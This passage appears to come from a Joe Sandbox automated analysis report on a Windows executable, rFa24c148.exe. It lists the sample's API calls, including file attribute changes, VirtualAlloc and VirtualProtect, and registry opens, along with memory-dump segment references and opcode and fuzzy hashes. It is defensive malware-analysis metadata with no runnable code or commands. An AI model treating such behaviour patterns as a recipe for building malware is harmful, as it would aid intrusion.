                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$EnableShow
                                                                                              • String ID:
                                                                                              • API String ID: 1136574915-0
                                                                                              • Opcode ID: 47b61285cae3f2a8e8a131cf160caa589dae6c71f8bd26570f639ce9431e4caa
                                                                                              • Instruction ID: 16f547f83e602d96c884a904eba2f663f46e66ccec186bf88b315e1392079143
                                                                                              • Opcode Fuzzy Hash: 47b61285cae3f2a8e8a131cf160caa589dae6c71f8bd26570f639ce9431e4caa
                                                                                              • Instruction Fuzzy Hash: BFE08671B04104DBCB50AFF469489DD7378AB50369B100877F401F10D1C6785C008A3D
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402DA9,C:\Users\user\Desktop\rFa24c148.exe,80000000,00000003,?,?,?,00000000,00403425,?), ref: 004059E7
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403425,?), ref: 00405A09
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: 4aea1d938fffc26f88db0c1450a16801fb26c1c2da6c6aae83084e0ba0c8a9b4
                                                                                              • Instruction ID: 6e3fe12f06474a07815b5ea3b085539d8110fe4fc4e7b987d4d26a3482594277
                                                                                              • Opcode Fuzzy Hash: 4aea1d938fffc26f88db0c1450a16801fb26c1c2da6c6aae83084e0ba0c8a9b4
                                                                                              • Instruction Fuzzy Hash: 75D09E71658201EFEF098F20DE16F6EBBA2EB84B00F10962DB652940E0D6715815DB16
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,004055C3,?,?,00000000,00405799,?,?,?,?), ref: 004059C3
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                              • Instruction ID: 23f3b5b08cf0a90752775bce35de55709fa588a0c5c1dd0fb40ccfe6c2119a3d
                                                                                              • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                                                              • Instruction Fuzzy Hash: E6D01272908120EFC2102728EE0C89BBF95DB543B17118B72FD75A22F0D7304C52CAB6
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNELBASE(00000000), ref: 10002927
                                                                                              • GetLastError.KERNEL32 ref: 10002A2E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2062996466.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2062980489.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063018747.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063039760.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocErrorLastVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 497505419-0
                                                                                              • Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                              • Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
                                                                                              • Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                              • Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
                                                                                              APIs
                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00401679
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMove
                                                                                              • String ID:
                                                                                              • API String ID: 3562171763-0
                                                                                              • Opcode ID: b52732b034676bd900c8dd09e9d96c0449bda3180a08bab671966732f7de0c2e
                                                                                              • Instruction ID: 083101987cfc82a6cf42c11d2d972b8aec6ba2fd7aec0dc483d5015516fa3923
                                                                                              • Opcode Fuzzy Hash: b52732b034676bd900c8dd09e9d96c0449bda3180a08bab671966732f7de0c2e
                                                                                              • Instruction Fuzzy Hash: A7F0B431A08220B3CB10ABB55F4DE8F62A89B6132DF34477BB512B21D1D6BC8901956F
                                                                                              APIs
                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040228A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringWrite
                                                                                              • String ID:
                                                                                              • API String ID: 390214022-0
                                                                                              • Opcode ID: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                              • Instruction ID: 4332bbb19f5efe4f35bb732f6f353b7f8865d75a24debaa01da2fd7198b4a795
                                                                                              • Opcode Fuzzy Hash: ec4fb41ec1acd106f93cf616f3cd4c0d3577891546256094c6c4aadbcc0c0451
                                                                                              • Instruction Fuzzy Hash: 18E04F329041246ADB113EF20E8DE7F31689B44718B24427FF551BA1C2D5BC1D434669
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(00000000,000004C8,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 699cda25c17bafbadca6f45bdb25344b0c8ec80eddbe54fe411ff33645398d31
                                                                                              • Instruction ID: b4a940ff9d96c873bdf480266a19e34540b316432bd0f5e01798d68014561859
                                                                                              • Opcode Fuzzy Hash: 699cda25c17bafbadca6f45bdb25344b0c8ec80eddbe54fe411ff33645398d31
                                                                                              • Instruction Fuzzy Hash: 89E0BF76254108BAD700EFA5DD46F9677ECEB14745F008425B609D6091C674E5508768
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031B1,00000000,00000000,00402FF1,000000FF,00000004,00000000,00000000,00000000), ref: 00405A7A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                              • Instruction ID: 68b9e35a43bd0b01ba0fc1ca952cb594bc8cf903dff1417d3183e578cb5b5c3a
                                                                                              • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                                                              • Instruction Fuzzy Hash: 53E0EC3261425AEFDF50AEA59C44AEB7B6CFB053A0F004433FD15E7190D231E9219FA9
                                                                                              APIs
                                                                                              • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027AB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2062996466.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2062980489.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063018747.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2063039760.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_10000000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                              • Instruction ID: 267fa8ad402a2f1685f06aa6efb9df116a04c7e31b4918ac066fddfc95f4d9be
                                                                                              • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                              • Instruction Fuzzy Hash: 5EF092F15097A0DEF350DF688C847063BE0E7483C4B03852AE368F6268EB344044CF19
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059970724.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_rFa24c148.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 2a616e06c792cf265676b57026b4e4a9577b39f593b79c63b522db00f6807e26
                                                                                              • Instruction ID: 3a008f1eb1b1242b40efb84196f5f05472ca672afc8891d9c26caab598a60342
                                                                                              • Opcode Fuzzy Hash: 2a616e06c792cf265676b57026b4e4a9577b39f593b79c63b522db00f6807e26
                                                                                              • Instruction Fuzzy Hash: 88D012B2B08100D7CB10DFE5AA08ADDB7659B10339F304A77D101F21D0D2B8C5419A2A
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040401A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2059739056.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2059723184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059757639.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2059776712.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
